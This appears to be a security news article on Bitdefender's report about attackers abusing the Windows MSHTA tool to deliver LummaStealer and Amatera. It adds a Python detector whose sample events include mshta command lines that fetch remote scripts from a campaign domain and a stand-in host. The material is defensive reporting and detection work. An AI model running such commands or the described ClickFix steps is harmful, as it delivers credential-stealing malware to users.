Hackers Abuse MSHTA Legacy Windows Tool to Deliver LummaStealer and Amatera Malware
By Tushar Subhra Dutta
May 20, 2026
Hackers are exploiting a decades-old Windows tool to deliver dangerous malware onto unsuspecting systems, with consequences ranging from stolen passwords to full system compromise.
The tool is MSHTA, short for Microsoft HTML Application Host, a built-in Windows utility that can run scripts from local files and remote internet locations.
Attackers have been using it to deliver some of today’s most harmful malware, including LummaStealer and Amatera.
What makes MSHTA attractive to cybercriminals is its legitimacy. It is a signed Microsoft binary, meaning Windows trusts it by default, and that built-in trust is exactly what attackers exploit.
Since the start of 2026, security teams have noticed a sharp rise in detections of mshta.exe in malicious infection chains. The fact that legitimate use of this tool is steadily declining makes the trend even more telling.
Researchers at Bitdefender identified the growing abuse and traced multiple active campaigns relying on MSHTA.
Bitdefender said in a report shared with Cyber Security News (CSN) that the activity spans a wide spectrum, from everyday password stealers to advanced threats capable of hiding on infected systems for long periods.
The research was authored by senior software engineer Janos Gergo Szeles and published on May 19, 2026.
Hackers Abuse MSHTA Legacy Windows Tool
The campaigns observed cover several malware families, including LummaStealer, Amatera, ClipBanker, CountLoader, Emmenhtal Loader, and PurpleFox.
All use MSHTA as a stepping stone during early or middle stages of infection. In some cases, MSHTA pulls a script from an attacker-controlled server, while in others it sits inside a longer chain involving phishing, fake software downloads, and ClickFix-style social engineering tricks.
What makes the situation particularly serious is that MSHTA remains on Windows by default with no announced removal timeline. While Microsoft plans to fully disable VBScript from Windows by 2027, MSHTA stays an open door for attackers for the foreseeable future.
One of the most active attack chains involves a loader called CountLoader, which uses MSHTA to deliver LummaStealer and Amatera.
The infection starts when a victim downloads what appears to be free or cracked software. Inside the archive is a file called Setup.exe, which is actually a legitimate Python interpreter bundled with malicious scripts that quietly launch the attack in the background.
Archive content with Python interpreter disguised as Setup.exe (Source – Bitdefender)
As the Python script runs, it uses a renamed MSHTA copy disguised as iso2022.exe to connect to attacker servers and fetch the next-stage payload.
Domains used in this campaign look like trusted services, such as google-services[.]cc and memory-scanner[.]cc, with the .cc top-level domain appearing repeatedly.
The campaign peaked at the end of January 2026 before attackers shifted to .vg and .gl domains, including explorer[.]vg and ccleaner[.]gl.
The final payload is most often LummaStealer, designed to harvest browser credentials, session cookies, and cryptocurrency wallet data.
Amatera, another stealer in the same chain, targets similar data. Both can silently drain accounts and pass stolen information to criminals, often while victims remain completely unaware.
ClickFix Social Engineering and the Emmenhtal Loader Chain
A separate campaign uses a different trick to get MSHTA running on victim machines. Attackers send phishing messages on Discord linking to fake verification pages disguised as reCAPTCHA systems.
When a user visits one of these pages, JavaScript secretly copies a malicious command to the clipboard and instructs them to press Win + R, paste it, and hit Enter.
CountLoader killchain (Source – Bitdefender)
That single action triggers MSHTA to fetch a remote script that runs entirely in memory, never touching the disk, helping it evade most file-based security tools.
Inside are multiple encoded layers that eventually execute a PowerShell command, dropping LummaStealer as the final payload.
Bitdefender recommends organizations move away from MSHTA in administrative workflows wherever possible and restrict or block binaries like mshta.exe where no longer needed.
User education matters just as much, given how heavily these campaigns rely on tricking people into running commands they do not fully understand.
A layered defense covering behavioral detection and runtime blocking remains the most effective way to stop these attacks before lasting damage is done.
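As an added example (not code from the article or from Bitdefender's report), the Python below runs the kind of behavioral check the recommendation above calls for over constructed Sysmon Event ID 1 (process creation) records, flagging the MSHTA behaviors described in both chains: a renamed copy recognised through the PE's OriginalFileName (the CountLoader chain's iso2022.exe), a remote URL on the command line, and a launch from explorer.exe as happens when a pasted command is run via Win+R. The sample events, the .example host and the explorer.exe parent heuristic are assumptions made for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample Sysmon Event ID 1 (process creation) records. Field names
# follow Sysmon's schema; hosts and paths are made up for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\u\AppData\Local\Temp\iso2022.exe",   # renamed MSHTA (CountLoader)
     "OriginalFileName": "MSHTA.EXE",
     "CommandLine": "iso2022.exe https://google-services.cc/update",
     "ParentImage": r"C:\Users\u\Downloads\Setup.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",               # ClickFix via Win+R
     "OriginalFileName": "MSHTA.EXE",
     "CommandLine": "mshta https://recaptcha-verify.example/Capcha.html",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",               # local admin HTA, benign
     "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r"mshta.exe C:\Tools\inventory.hta",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
SUSPICIOUS_TLDS = {"cc", "vg", "gl"}  # TLDs named in the Bitdefender report


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyse(event):
    """Return the findings for one process-creation event (empty list = no alert)."""
    findings = []
    # Key on the PE's OriginalFileName rather than the on-disk name, so a renamed
    # copy such as the report's iso2022.exe is still recognised as MSHTA.
    if event.get("OriginalFileName", "").upper() != "MSHTA.EXE":
        return findings
    image = basename(event["Image"])
    if image != "mshta.exe":
        findings.append(f"renamed mshta copy: {image}")
    for url in URL_RE.findall(event.get("CommandLine", "")):
        findings.append(f"remote script fetch: {url}")
        host = urlparse(url).hostname or ""
        if host.rsplit(".", 1)[-1] in SUSPICIOUS_TLDS:
            findings.append(f"suspicious TLD: {host}")
    # Assumed heuristic: a Win+R launch shows explorer.exe as the parent process.
    if findings and basename(event.get("ParentImage", "")) == "explorer.exe":
        findings.append("launched from the shell with a remote URL (ClickFix pattern)")
    return findings


def scan(events):
    """Map each alerting Image path to its findings; clean events are dropped."""
    return {e["Image"]: f for e in events if (f := analyse(e))}
```

The third sample (a local .hta run from cmd.exe) produces no findings, so the check does not fire on routine local use and can sit alongside the stricter block-or-restrict policy the report recommends.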
Indicators of Compromise (IoCs)
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.